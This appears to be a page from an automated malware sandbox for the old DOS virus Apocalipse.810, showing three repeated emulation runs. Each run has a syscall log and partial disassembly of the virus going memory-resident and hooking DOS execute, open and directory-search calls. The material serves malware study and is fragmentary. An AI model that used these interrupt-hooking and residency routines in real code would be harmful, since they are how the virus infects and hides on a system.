Sample viewer

vx.netlux.org/Virus.DOS.Apocalipse.810

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:18.835565849Z 119 PC: 12a48 | UNKNOWN!
2018-12-17T22:52:18.839220089Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
0x12a55: jne 0x12a5a
0x12a57: call 0x12c91
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34
0x12a64: nop
0x12a65: mov ah, 0x4a
0x12a67: int 0x21
0x12a69: mov ah, 0x48
0x12a6b: mov bx, 0x33
0x12a6e: int 0x21
0x12a70: jb 0x12ac1
0x12a72: dec ax
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8
0x12a7c: push ax
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-17T22:52:18.842072307Z 74 PC: 12a61 | Reallocate memory
2018-12-17T22:52:18.844235863Z 74 PC: 12a69 | Reallocate memory
2018-12-17T22:52:18.846062532Z 72 PC: 12a70 | Allocate memory
2018-12-17T22:52:18.850252905Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:52:18.851815594Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-17T22:52:18.853787163Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:52:18.857599001Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
0x12ad8: ja 0x12add
0x12ada: call 0x12c52
0x12add: mov ax, 0x100
0x12ae0: jmp ax
0x12ae2: int 0x20
0x12ae4: nop
0x12ae5: jmp 0x12ae8
0x12ae8: cmp ax, 0x7777
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952
0x12af0: iret
0x12af1: cmp ax, 0x4b00
0x12af4: je 0x12b56
0x12af6: cmp ah, 0x3d
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f
0x12afe: cmp ah, 0x11
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12

{"DateBased":true,"Day":6,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:21.668556449Z 119 PC: 12a48 | UNKNOWN!
2018-12-25T12:29:21.670031849Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
0x12a55: jne 0x12a5a
0x12a57: call 0x12c91
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34
0x12a64: nop
0x12a65: mov ah, 0x4a
0x12a67: int 0x21
0x12a69: mov ah, 0x48
0x12a6b: mov bx, 0x33
0x12a6e: int 0x21
0x12a70: jb 0x12ac1
0x12a72: dec ax
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8
0x12a7c: push ax
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-25T12:29:23.25732117Z 74 PC: 12a61 | Reallocate memory
2018-12-25T12:29:23.259030818Z 74 PC: 12a69 | Reallocate memory
2018-12-25T12:29:23.260466314Z 72 PC: 12a70 | Allocate memory
2018-12-25T12:29:23.262746199Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:23.264189096Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-25T12:29:23.266122371Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:23.26895069Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
0x12ad8: ja 0x12add
0x12ada: call 0x12c52
0x12add: mov ax, 0x100
0x12ae0: jmp ax
0x12ae2: int 0x20
0x12ae4: nop
0x12ae5: jmp 0x12ae8
0x12ae8: cmp ax, 0x7777
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952
0x12af0: iret
0x12af1: cmp ax, 0x4b00
0x12af4: je 0x12b56
0x12af6: cmp ah, 0x3d
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f
0x12afe: cmp ah, 0x11
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:21.790463886Z 119 PC: 12a48 | UNKNOWN!
2018-12-25T12:29:21.791747923Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
0x12a55: jne 0x12a5a
0x12a57: call 0x12c91
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34
0x12a64: nop
0x12a65: mov ah, 0x4a
0x12a67: int 0x21
0x12a69: mov ah, 0x48
0x12a6b: mov bx, 0x33
0x12a6e: int 0x21
0x12a70: jb 0x12ac1
0x12a72: dec ax
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8
0x12a7c: push ax
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-25T12:29:21.794547982Z 74 PC: 12a61 | Reallocate memory
2018-12-25T12:29:21.796233412Z 74 PC: 12a69 | Reallocate memory
2018-12-25T12:29:21.798420183Z 72 PC: 12a70 | Allocate memory
2018-12-25T12:29:21.80003285Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:21.80120597Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-25T12:29:21.802946018Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:21.805079834Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
0x12ad8: ja 0x12add
0x12ada: call 0x12c52
0x12add: mov ax, 0x100
0x12ae0: jmp ax
0x12ae2: int 0x20
0x12ae4: nop
0x12ae5: jmp 0x12ae8
0x12ae8: cmp ax, 0x7777
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952
0x12af0: iret
0x12af1: cmp ax, 0x4b00
0x12af4: je 0x12b56
0x12af6: cmp ah, 0x3d
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f
0x12afe: cmp ah, 0x11
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12